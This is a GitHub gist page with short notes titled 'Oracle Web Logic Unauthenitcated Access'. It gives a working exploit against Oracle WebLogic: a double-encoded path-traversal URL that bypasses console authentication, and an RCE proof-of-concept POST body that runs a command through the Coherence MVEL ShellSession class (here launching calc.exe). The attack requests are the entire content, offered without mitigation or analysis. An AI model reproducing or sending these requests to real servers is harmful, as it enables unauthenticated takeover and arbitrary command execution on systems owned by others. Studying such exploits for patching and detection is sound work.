Skip to content

Instantly share code, notes, and snippets.

@chr0n1k
Last active October 29, 2020 07:10
Show Gist options
  • Save chr0n1k/5959a18b4ba9c14f1c7c43cae4adcd76 to your computer and use it in GitHub Desktop.
Save chr0n1k/5959a18b4ba9c14f1c7c43cae4adcd76 to your computer and use it in GitHub Desktop.

Revisions

  1. chr0n1k revised this gist Oct 29, 2020. No changes.
  2. chr0n1k revised this gist Oct 29, 2020. 1 changed file with 7 additions and 0 deletions.
    7 changes: 7 additions & 0 deletions Oracle Web Logic Unauthenitcated Access.md
    Original file line number Diff line number Diff line change
    @@ -1,2 +1,9 @@
    Unauthenticated Access:
    <domainname/ip>:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(test)

    RCE POC:
    http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

    POST:

    _nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
  3. chr0n1k revised this gist Oct 29, 2020. 1 changed file with 2 additions and 1 deletion.
    3 changes: 2 additions & 1 deletion Oracle Web Logic Unauthenitcated Access.md
    Original file line number Diff line number Diff line change
    @@ -1 +1,2 @@
    <domainname/ip>:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(test)
    <domainname/ip>:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(test)

  4. chr0n1k revised this gist Oct 28, 2020. No changes.
  5. chr0n1k created this gist Oct 28, 2020.
    1 change: 1 addition & 0 deletions Oracle Web Logic Unauthenitcated Access.md
    Original file line number Diff line number Diff line change
    @@ -0,0 +1 @@
    <domainname/ip>:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(test)